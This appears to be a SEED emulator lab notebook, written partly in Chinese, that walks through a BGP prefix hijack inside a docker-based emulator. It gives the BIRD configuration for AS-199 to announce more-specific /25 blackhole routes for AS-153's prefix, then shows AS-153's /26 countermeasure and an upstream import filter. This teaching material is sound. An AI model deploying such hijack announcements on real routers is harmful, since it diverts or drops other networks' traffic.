# BGP Prefix Hijacking Attack

## Environment setup

First, we need to start the emulator.

In this lab, we use AS-199 as the attacker to hijack AS-153's IP prefix（`10.153.0.0/24`）。To help observe the attack effect, we first ping one of the machine in AS-153 from a machine, On the Internet Map, we can see how packet flows (we need to type in `icmp` in the `Filter` field, followed by a return）：

In [ ]:
%%bash --bg
docker exec as151h-host_0-10.151.0.71 ping 10.153.0.71

## 1. 劫持 AS-153

第一步：攻击者是 AS-199， 所以我们先获取 AS-199 的 BGP 配置文件，对其进行修改。可以通过下面的命令从仿真器里获得配置文件。

In [1]:
!docker cp as199brd-router0-10.199.0.254:/etc/bird/bird.conf ./as199_bird.conf

Successfully copied 3.07kB to /home/seed/git/seed-emulator/examples/yesterday-once-more/Y01_bgp_prefix_hijacking/demo/as199_bird.conf


第二步：我们将下面的配置内容加到 AS-199 的 BGP 配置文件的最后。这些配置对 `10.153.0.0/24` 网络进行了劫持

```
##############################################
# Added BGP Attack
# Hijack AS153's network prefix 10.153.0/24
##############################################

protocol static {
  ipv4 { table t_bgp;  };
  route 10.153.0.0/25 blackhole   {
      bgp_large_community.add(LOCAL_COMM);
  };
  route 10.153.0.128/25 blackhole {
      bgp_large_community.add(LOCAL_COMM);
  };
}
```

第三步：完成了上面的修改后将改过后的 BGP 配置文件拷贝回 AS-199，然后重启 AS-199 的 BGP 守护进程。我们把修改过的配置文件放在了 `as199brd_bird.conf_malicious` 中。

In [2]:
%%bash
docker cp  as199brd_bird.conf_malicious as199brd-router0-10.199.0.254:/etc/bird/bird.conf
docker exec as199brd-router0-10.199.0.254 birdc configure

BIRD 2.0.7 ready.
Reading configuration from /etc/bird/bird.conf
Reconfigured


第四步：从 Internet Map 上我们可以看到数据包的流向改变了，流向了 AS-199。现在在任何一台机器是 `ping 10.153.0.71`, 都会发现没有回复。我们可以去看一下 `as3brd-r103-10.103.0.3` 上的路由（这是一个 transit 自治系统），我们可以看到网络 AS-153 的网络有 3 个记录，其中 `10.153.0.0/25` 和 `10.153.0.128/25` 完全覆盖了 `10.153.0.0/24`。从记录可以看出，去往前两个地址的下一跳路由（`10.3.0.254`）和去往 `10.153.0.0/24` 的下一跳路由（`10.3.3.253`）是不一样的，这说明去往 AS-153 的包改道了。

In [ ]:
!docker exec as3brd-r103-10.103.0.3 ip route

## 2. AS-153 的反击

第一步：AS-153 可以用同样的方法将自己的网络劫持回来。只要在自己的 BGP 配置文件中加入下面的内容即可，然后重启 BGP 守护进程。

```
#########################################
# Added for BGP Attack
# Fight back
#########################################

protocol static {
  ipv4 { table t_bgp; };
  route 10.153.0.0/26 via "net0" {
           bgp_large_community.add(LOCAL_COMM);
  };
  route 10.153.0.64/26 via "net0" {
           bgp_large_community.add(LOCAL_COMM);
  };
  route 10.153.0.128/26 via "net0" {
           bgp_large_community.add(LOCAL_COMM);
  };
  route 10.153.0.192/26 via "net0" {
           bgp_large_community.add(LOCAL_COMM);
  };
}

```

第二步：我们已经将修改过的配置放在了 `as153brd_bird.conf_fightback` 中，只要把它拷贝回 AS-153 的容器就可以。运行完下面的命令后，从 Internet Map 上我们可以看到数据包的流向改变了，重新流向了 AS-153。

In [3]:
%%bash
docker cp as153brd_bird.conf_fightback as153brd-router0-10.153.0.254:/etc/bird/bird.conf
docker exec as153brd-router0-10.153.0.254 birdc configure

BIRD 2.0.7 ready.
Reading configuration from /etc/bird/bird.conf
Reconfigured


## 3. 让 AS-199 的上游服务商来解决问题

第一步：在做这个任务之前，我们先恢复 AS-153 的配置，这样攻击仍然有效，我们就可以让上游服务商来解决这个问题。

In [ ]:
%%bash
docker cp as153brd_bird.conf_original as153brd-router0-10.153.0.254:/etc/bird/bird.conf
docker exec as153brd-router0-10.153.0.254 birdc configure

第二步：我们先来看一下 AS-199 的上游服务商是谁。下面的命令在 AS-199 的 BGP 路由器向 BGP 的守护进程 `bird` 查询信息。

In [ ]:
!docker exec as199brd-router0-10.199.0.254 birdc show protocols

从结果我们可以看到只有一个 BGP session（第2列），也就是 `u_as2`，这是 AS-2。这个自治系统在多处有 BGP 路由器，从 Internet Map 上可以看到，AS-199 和 AS-2 是在 IX-105 进行的对待连接（peering）。我们可以找到相应的容器的名字（`as2brd-r105-10.105.0.2`）：

In [ ]:
!docker ps | grep as2

第三步：我们可以获取 `as2brd-r105-10.105.0.2` 的 BGP 配置文件，加入一行到它和 AS-199 的配置里（见下面的带注释的行）。这行判断 AS-199 对外 announce 的网络前缀是否是 `10.199.0.0/24`，如果不是的话就拒绝接受这个 BGP announcement。
```
protocol bgp c_as199 {
    ipv4 {
        table t_bgp;
        import filter {
            bgp_large_community.add(CUSTOMER_COMM);
            bgp_local_pref = 30;
            if (net != 10.199.0.0/24) then reject;  ### 阻挡伪造的 BGP announcement 
            accept;
        };
        export all;
        next hop self;
    };
    local 10.105.0.2 as 2;
    neighbor 10.105.0.199 as 199;
}
```

第四步：把修改过的 BGP 配置文件传回 `as2brd-r105-10.105.0.2`。我们修改过的文件是 `as2brd-r105_bird.conf_fixproblem`。运行完下面的命令，从 Internet Map 上我们可以看到数据包的流向改变了，重新流向了 AS-153。

In [ ]:
%%bash
docker cp  as2brd-r105_bird.conf_fixproblem as2brd-r105-10.105.0.2:/etc/bird/bird.conf
docker exec as2brd-r105-10.105.0.2 birdc configure